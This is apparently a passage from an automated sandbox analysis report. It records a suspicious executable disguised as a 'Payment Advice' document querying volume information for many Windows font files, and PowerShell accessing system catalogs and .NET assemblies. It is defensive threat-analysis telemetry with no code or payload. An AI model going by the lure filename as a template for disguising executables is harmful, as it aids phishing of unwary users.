                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
